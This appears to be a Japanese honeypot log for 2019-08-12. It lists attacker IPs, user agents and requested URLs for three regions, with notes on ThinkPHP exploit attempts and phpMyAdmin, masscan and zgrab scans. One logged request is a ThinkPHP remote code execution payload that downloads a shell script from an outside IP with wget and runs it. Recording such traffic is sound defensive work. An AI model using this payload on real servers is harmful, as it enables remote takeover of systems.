ハニーポット(仮) 観測記録 2019/08/12分です。
特徴
Region:AP
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
masscanでのスキャン行為
ZmEuでのスキャン行為
zgrabでのスキャン行為
を確認しました。
Region:US
phpMyAdminに対するスキャン行為
110[.]249[.]212[.]46に関する不正通信
zgrabでのスキャン行為
を確認しました。
Region:EU
phpMyAdminに対するスキャン行為
zgrabでのスキャン行為
を確認しました。
他
アクセス数推移
AP:総アクセス数:57 (前日比:+26)
US:総アクセス数:32 (前日比:+20)
EU:総アクセス数:28 (前日比:-5)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 2 | 107.170.202.129 | United States |
| 2 | 112.3.28.71 | China |
| 3 | 117.3.101.235 | Vietnam |
| 4 | 124.251.44.162 | China |
| 6 | 132.148.31.65 | United States |
| 1 | 13.82.180.114 | United States |
| 1 | 139.199.192.193 | China |
| 1 | 149.202.10.237 | France |
| 1 | 157.55.39.32 | United States |
| 1 | 162.243.149.130 | United States |
| 1 | 162.243.151.221 | United States |
| 4 | 183.131.18.169 | China |
| 5 | 185.100.87.191 | Romania |
| 4 | 209.141.53.82 | United States |
| 4 | 217.101.252.95 | Netherlands |
| 1 | 27.115.124.70 | China |
| 1 | 37.187.50.101 | France |
| 1 | 52.58.12.201 | Germany |
| 1 | 61.219.11.153 | Taiwan |
| 2 | 62.4.27.96 | France |
| 6 | 77.247.110.165 | Netherlands |
| 2 | 77.247.110.69 | Netherlands |
| 3 | 91.121.209.213 | France |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 22 | - |
| 1 | curl/7.47.0 |
| 2 | Go-http-client/1.1 |
| 3 | masscan/1.0 (https://github.com/robertdavidgraham/masscan) |
| 1 | Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) |
| 3 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 |
| 4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 |
| 5 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 |
| 7 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 4 | Mozilla/5.0 zgrab/0.x |
| 1 | User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705 |
| 2 | ZmEu |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 1 | CONNECT | i.instagram.com:443 | HTTP/1.1 |
| 1 | GET | /evox/about | HTTP/1.1 |
| 1 | GET | /.git/config | HTTP/1.0 |
| 2 | GET | /.git/config | HTTP/1.1 |
| 1 | GET | /HNAP1 | HTTP/1.1 |
| 1 | GET | /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=wget%20http://96[.]32[.]50[.]131/a_thk.sh%20-O%20/tmp/a_thk;%20chmod%200777%20/tmp/a_thk;%20/tmp/a_thk; | HTTP/1.1 |
| 6 | GET | /manager/html | HTTP/1.1 |
| 2 | GET | /manager/text/list | HTTP/1.1 |
| 1 | GET | /muieblackcat | HTTP/1.1 |
| 1 | GET | //myadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //MyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/scripts/setup.php | HTTP/1.1\n |
| 1 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /nmaplowercheck1565493923 | HTTP/1.1 |
| 1 | GET | //phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1\n |
| 1 | GET | //pma/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /pma/scripts/setup.php | HTTP/1.1\n |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /scripts/setup.php | HTTP/1.1\n |
| 1 | GET | /server-status | HTTP/1.1 |
| 2 | GET | /TP/index.php | HTTP/1.1 |
| 2 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 3 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
| 2 | GET | /xmlrpc.php | HTTP/1.1 |
| 2 | HEAD | / | HTTP/1.1 |
| 3 | HEAD | /robots.txt | HTTP/1.0 |
| 5 | HEAD | /robots.txt | HTTP/1.1 |
| 1 | POST | /sdk | HTTP/1.1 |
| 2 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
Region:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 107.170.240.84 | United States |
| 1 | 110.249.212.46 | China |
| 5 | 112.50.200.122 | China |
| 6 | 209.141.53.82 | United States |
| 2 | 222.186.144.17 | China |
| 1 | 27.115.124.70 | China |
| 1 | 61.219.11.153 | Taiwan |
| 2 | 77.247.110.165 | Netherlands |
| 2 | 77.247.110.69 | Netherlands |
| 11 | 77.71.232.88 | Malta |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 14 | - |
| 11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 |
| 5 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 1 | GET | /admin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin2/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin3/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin4/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpMyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpMyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /server-status | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 4 | HEAD | /robots.txt | HTTP/1.0 |
| 1 | \x16\x03\x01\x02 | ||
| 1 | \x80\xf1\x01\x03\x03 |
Region:EU
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 107.170.203.160 | United States |
| 1 | 149.202.10.237 | France |
| 1 | 164.132.153.130 | France |
| 4 | 167.179.94.79 | Japan |
| 5 | 208.100.26.231 | United States |
| 2 | 77.247.110.165 | Netherlands |
| 13 | 86.2.22.75 | United Kingdom |
| 1 | 91.121.209.213 | France |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 4 | - |
| 1 | masscan/1.0 (https://github.com/robertdavidgraham/masscan) |
| 13 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
| 5 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 |
| 4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | CONNECT | i.instagram.com:443 | HTTP/1.1 |
| 1 | GET | /2phpmyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /evox/about | HTTP/1.1 |
| 1 | GET | /.git/config | HTTP/1.0 |
| 1 | GET | /HNAP1 | HTTP/1.1 |
| 2 | GET | /index.php | HTTP/1.1 |
| 1 | GET | /manager/text/list | HTTP/1.1 |
| 1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /nmaplowercheck1565498129 | HTTP/1.1 |
| 1 | GET | /phpmyadmin2/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin3/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin4/index.php?lang=en | HTTP/1.1 |
| 2 | GET | /phpmyadmin/index.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpMyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpMyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en | HTTP/1.1 |
| 1 | HEAD | / | HTTP/1.1 |
| 2 | HEAD | /robots.txt | HTTP/1.0 |
| 1 | POST | /sdk | HTTP/1.1 |
